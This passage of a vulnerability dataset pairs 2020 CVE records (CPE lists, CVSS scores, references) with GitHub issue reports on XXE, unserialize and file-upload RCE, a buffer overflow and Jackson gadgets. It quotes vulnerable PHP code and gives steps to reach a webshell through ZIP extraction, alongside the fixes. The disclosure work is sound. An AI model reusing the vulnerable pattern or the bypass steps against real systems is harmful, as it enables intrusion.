"D01A0BBC-DA0E-4AFE-83BF-4F3BA01653EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", "matchCriteriaId": "526E2FE5-263F-416F-8628-6CD40B865780", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "0331877D-D5DB-4EE8-8220-C1CDC3F90CB0", "versionEndExcluding": null, "versionEndIncluding": "8.2.4.0", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "C4A94B36-479F-48F2-9B9E-ACEA2589EF48", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_messaging_server:8.1:*:*:*:*:*:*:*", "matchCriteriaId": "E1214FDF-357A-4BB9-BADE-50FB2BD16D10", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_offline_mediation_controller:12.0.0.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "49ACFC73-A509-4D1C-8FC3-F68F495AB055", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_policy_management:12.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "5312AC7A-3C16-4967-ACA6-317289A749D0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_pricing_design_center:12.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "A28F42F0-FBDA-4574-AD30-7A04F27FEA3E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "062E4E7C-55BB-46F3-8B61-5A663B565891", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "FB3E2625-08F0-4C8E-B43F-831F0290F0D7", "versionEndExcluding": null, "versionEndIncluding": "8.2.2.1", "versionStartExcluding": null, "versionStartIncluding": "8.0.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "F5AA3C04-30A4-4975-B878-C5777F8BB918", "versionEndExcluding": null, "versionEndIncluding": "8.2.2.1", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "A7637F8B-15F1-42E2-BE18-E1FF7C66587D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:identity_manager_connector:11.1.1.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "9D7EA92D-9F26-4292-991A-891597337DFD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:siebel_core_-_server_framework:*:*:*:*:*:*:*:*", "matchCriteriaId": "F9C855EA-6E35-4EFF-ADEB-0EDFF90272BD", "versionEndExcluding": null, "versionEndIncluding": "21.5", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:siebel_ui_framework:*:*:*:*:*:*:*:*", "matchCriteriaId": "0D9E0011-6FF5-4C90-9780-7A1297BB09BF", "versionEndExcluding": null, "versionEndIncluding": "21.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2798
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget type(s) reported regarding class(es) of `com.pastdev.httpcomponents:configuration`. library. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2020-24750 Reporter(s): Al1ex@knownsec Fix is included in: * 2.9.10.6 (usable via `jackson-bom` version `2.9.10.20200824`) * 2.6.7.5 * Not considered valid CVE for Jackson 2.10.0 and later (see https://medium.com/@cowtowncoder/jackson-2-10-safe-default-typing-2d018f0ce2ba)
Block one more gadget type (com.pastdev.httpcomponents, CVE-2020-24750)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2798/comments
2
2020-07-16T17:25:52Z
2021-06-22T04:03:19Z
https://github.com/FasterXML/jackson-databind/issues/2798
658,400,094
2,798
1,430
CVE-2020-25750
2020-09-18T04:15:12.127
An issue was discovered in DotPlant2 before 2020-09-14. In class Pay2PayPayment in payment/Pay2PayPayment.php, there is an XXE vulnerability in the checkResult function. The user input ($_POST['xml']) is used for simplexml_load_string without sanitization. NOTE: This vulnerability only affects products that are no longer supported by the maintainer
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/DevGroup-ru/dotplant2/issues/400" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/DevGroup-ru/dotplant2/issues/400" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dotplant:dotplant2:*:*:*:*:*:*:*:*", "matchCriteriaId": "78887E78-21B0-4AD6-83B6-E600313E263A", "versionEndExcluding": "2020-09-14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/DevGroup-ru/dotplant2/issues/400
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "DevGroup-ru", "dotplant2" ]
In class Pay2PayPayment(application\components\payment\Pay2PayPayment.php), there is an XXE vulnerability in _checkResult_ function. ```php public function checkResult($hash = '') { if (isset($_POST['xml'], $_POST['sign'])) { $xml = base64_decode(str_replace(' ', '+', $_POST['xml'])); $sign = base64_decode(str_replace(' ', '+', $_POST['sign'])); $data = simplexml_load_string($xml); ``` The user input($_POST['xml']) has been put into simplexml_load_string without sanitation. Although this parser does not print anything, attackers could also use blind XXE to get sensitive information. You could use `libxml_disable_entity_loader(true);` to avoid this vulnerability. Thx
XXE Vulnerability
https://api.github.com/repos/DevGroup-ru/dotplant2/issues/400/comments
1
2020-09-13T13:11:04Z
2020-09-19T08:09:56Z
https://github.com/DevGroup-ru/dotplant2/issues/400
700,567,445
400
1,431
CVE-2020-25756
2020-09-18T05:15:13.197
A buffer overflow vulnerability exists in the mg_get_http_header function in Cesanta Mongoose 6.18 due to a lack of bounds checking. A crafted HTTP header can exploit this bug. NOTE: a committer has stated "this will not happen in practice.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mongoose/issues/1135" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mongoose/issues/1135" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mongoose:6.18:*:*:*:*:*:*:*", "matchCriteriaId": "1F4949BC-D04D-4DB8-9E7E-4459648D712E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/cesanta/mongoose/issues/1135
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mongoose" ]
A buffer overflow error in mg_get_http_header function in mongoose/src/mg_http.c in Mongoose 6.18, where header_names and header_values have a bound of (MG_MAX_HTTP_HEADERS); however, there is no check to ensure that the loop does not exceed the upper bound. A Maliciously crafted http header can trigger this bug. To fix it, modify the loop condition into: for (i = 0;i < MG_MAX_HTTP_HEADERS && hm->header_names[i].len > 0 ; i++)
A buffer overflow error in mg_get_http_header
https://api.github.com/repos/cesanta/mongoose/issues/1135/comments
4
2020-08-12T22:11:29Z
2020-09-19T07:43:13Z
https://github.com/cesanta/mongoose/issues/1135
678,010,053
1,135
1,432
CVE-2020-15188
2020-09-18T17:15:12.503
SOY CMS 3.0.2.327 and earlier is affected by Unauthenticated Remote Code Execution (RCE). The allows remote attackers to execute any arbitrary code when the inquiry form feature is enabled by the service. The vulnerability is caused by unserializing the form without any restrictions. This was fixed in 3.0.2.328.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/issues/10" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/pull/12/commits/a75642989132dd25f74a13194b27c0986c3de020" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/security/advisories/GHSA-hrrx-m22r-p9jp" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.youtube.com/watch?v=zAE4Swjc-GU&feature=youtu.be" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/pull/12/commits/a75642989132dd25f74a13194b27c0986c3de020" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/security/advisories/GHSA-hrrx-m22r-p9jp" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.youtube.com/watch?v=zAE4Swjc-GU&feature=youtu.be" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:brassica:soy_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "DE978394-A82D-43E0-AE72-36ABB7FBB3F9", "versionEndExcluding": "3.0.2.328", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/inunosinsi/soycms/issues/10
[ "Exploit", "Third Party Advisory" ]
github.com
[ "inunosinsi", "soycms" ]
## Title Unauthenticated Remote Code Execution (RCE) in SoyCMS ## Summary Severity: Critical SoyCMS 3.0.2 and earlier is affected by Unauthenticated Remote Code Execution (RCE). The allows remote attackers to execute any arbitrary code when the inquiry form feature is enabled by the website. The vulnerability is caused by unserializing the form without any restrictions. Impact: Unauthenticated Remote Code Execution via Inquiry Form * Attack vector is: Inquiry Form needs to be enabled. * Components are: Soy Inquiry Form * Tested SoyCMS Version : 3.0.2 (latest) * Affected SoyCMS Version : ~3.0.2 Found by @stypr from Vulnerability Research Team in [Flatt Security Inc.](https://flatt.tech/) Full Exploit Video: https://youtu.be/zAE4Swjc-GU ## Cause When the inquiry is submitted and the captcha is taken, form submits `form_value` and `form_hash`, and value is checked as the following. https://github.com/inunosinsi/soycms/blob/0373eb13c47778995ad3097e67873c2e0b5d97e2/cms/app/webapp/inquiry/page.php#L126-L133 By the PHP's official guideline, unserialize is a function that should not be used when user can control the argument (Reference: https://www.php.net/manual/en/function.unserialize.php) `md5($value) == form_hash` can be generated locally, so it is possible to control this value and use appropriate classes to trigger code execution. ## Remediation Use `json_encode` and `json_decode` instead. I will make a Fix PR as soon as possible.
Unauthenticated Remote Code Execution (RCE) in SoyCMS
https://api.github.com/repos/inunosinsi/soycms/issues/10/comments
1
2020-09-14T12:06:36Z
2020-09-16T06:49:32Z
https://github.com/inunosinsi/soycms/issues/10
701,036,570
10
1,433
CVE-2020-15189
2020-09-18T18:15:16.863
SOY CMS 3.0.2 and earlier is affected by Remote Code Execution (RCE) using Unrestricted File Upload. Cross-Site Scripting(XSS) vulnerability that was used in CVE-2020-15183 can be used to increase impact by redirecting the administrator to access a specially crafted page. This vulnerability is caused by insecure configuration in elFinder. This is fixed in version 3.0.2.328.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/issues/9" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/pull/14" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/pull/14/commits/e4ef00677ed52f9e5a5fcfcb56b797f5412b5d59" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/security/advisories/GHSA-6r2f-p68g-m433" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://youtu.be/FWIDFNXmr9g" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/pull/14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/pull/14/commits/e4ef00677ed52f9e5a5fcfcb56b797f5412b5d59" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/security/advisories/GHSA-6r2f-p68g-m433" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://youtu.be/FWIDFNXmr9g" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:brassica:soy_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "DE978394-A82D-43E0-AE72-36ABB7FBB3F9", "versionEndExcluding": "3.0.2.328", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/inunosinsi/soycms/issues/9
[ "Exploit", "Mitigation", "Third Party Advisory" ]
github.com
[ "inunosinsi", "soycms" ]
## Title Remote Code Execution (RCE) in SoyCMS ## Summary Severity: High SoyCMS 3.0.2 and earlier is affected by Remote Code Execution (RCE) using Unrestricted File Upload. Cross-Site Scripting(XSS) vulnerability that was reported earlier can be chained in order to perform a successful remote code execution by redirecting the administrator to load a specially crafted webpage. Impact: XSS to RCE via Inquiry Error and Unrestricted File Upload * Attack vector is: Administrator must be logged in. * Components are: File Manager * Tested SoyCMS Version : 3.0.2 (latest) * Affected SoyCMS Version : ~3.0.2 Found by @stypr from Vulnerability Research Team in [Flatt Security Inc.](https://flatt.tech/) Full Exploit Video: https://youtu.be/FWIDFNXmr9g ## Cause The file upload feature in FileManager is using elFinder. However, it was found out that mimetype can be fooled to upload a PHP file. There is no feature in elFinder to check the file type so it needs to be manually implemented. https://github.com/inunosinsi/soycms/blob/34e066d0f95e1d33ce35f027ddb1315742a26c8e/cms/soycms/js/elfinder/php/connector.php#L143-L159 https://github.com/inunosinsi/soycms/blob/4375940fc1537c1664f68fc7b766a97c60596a1d/cms/soycms/js/elfinder/php/connector.php-change2#L188-L215 ## Remediation Please add a file extension check from accessControl. https://github.com/Studio-42/elFinder/blob/b3e92120a8657bdd263ad750dc9760c8d5aa2a89/php/connector.minimal.php-dist#L47-L59
Remote Code Execution (RCE) in SoyCMS
https://api.github.com/repos/inunosinsi/soycms/issues/9/comments
0
2020-09-14T12:05:06Z
2020-09-16T06:57:59Z
https://github.com/inunosinsi/soycms/issues/9
701,035,586
9
1,434
CVE-2020-25790
2020-09-19T21:15:12.140
Typesetter CMS 5.x through 5.1 allows admins to upload and execute arbitrary PHP code via a .php file inside a ZIP archive. NOTE: the vendor disputes the significance of this report because "admins are considered trustworthy"; however, the behavior "contradicts our security policy" and is being fixed for 5.2
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/159503/Typesetter-CMS-5.1-Remote-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/159615/Typesetter-CMS-5.1-Remote-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2020/Oct/11" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Typesetter/Typesetter/issues/674" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/159503/Typesetter-CMS-5.1-Remote-Code-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/159615/Typesetter-CMS-5.1-Remote-Code-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2020/Oct/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Typesetter/Typesetter/issues/674" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typesettercms:typesetter:*:*:*:*:*:*:*:*", "matchCriteriaId": "37ADABCC-CA0E-4860-8A02-27E51BCE0B19", "versionEndExcluding": null, "versionEndIncluding": "5.1", "versionStartExcluding": null, "versionStartIncluding": "5.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/Typesetter/Typesetter/issues/674
[ "Third Party Advisory" ]
github.com
[ "Typesetter", "Typesetter" ]
Hello all, I was testing the upload mechanism, and I found that it is possible to bypass the protection for .php files by placing the .php inside a .zip file and extracting it. Once this is done, it is possible to execute commands on the machine using a malicious php file (webshell). Okay, that and the viability decreased a little because it is an admin functionality, however, if it is not allowed to upload a .php file, then placing the same file inside a .zip and extracting and executing it should also not be allowed . * Steps to reproduce 1- As admin go to Content menu and click on Uploaded files 2- Inside the try to upload a .php file, and 3- try to upload a .php file directly, check that it is not possible. 4- Take the same .php file and place it in a .zip and upload it. 5- Extract through functionality and open the .php file **Obs**: A strange behavior was that, after extracting the PHP file in functionality, it is seen as HTML. * PoC ==> Executing Commands ![poc_f](https://user-images.githubusercontent.com/61463998/93628701-5ea18400-f9bd-11ea-890d-c37101ec5b7d.gif) ==> Try to upload a .php direct ![test](https://user-images.githubusercontent.com/61463998/93628723-6d883680-f9bd-11ea-9d89-610565c43878.gif)
Bypass File Uploading restrictions leads to Command Execution
https://api.github.com/repos/Typesetter/Typesetter/issues/674/comments
10
2020-09-18T17:44:24Z
2020-09-19T14:26:52Z
https://github.com/Typesetter/Typesetter/issues/674
704,549,132
674
1,435
CVE-2020-25791
2020-09-19T21:15:12.203
An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, the array size is not checked when constructed with unit().
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/bodil/sized-chunks/issues/11" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://rustsec.org/advisories/RUSTSEC-2020-0041.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/bodil/sized-chunks/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://rustsec.org/advisories/RUSTSEC-2020-0041.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sized-chunks_project:sized-chunks:*:*:*:*:*:rust:*:*", "matchCriteriaId": "C880966D-057C-4626-9644-7C386CB9FBBD", "versionEndExcluding": null, "versionEndIncluding": "0.6.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "129" ]
129
https://github.com/bodil/sized-chunks/issues/11
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "bodil", "sized-chunks" ]
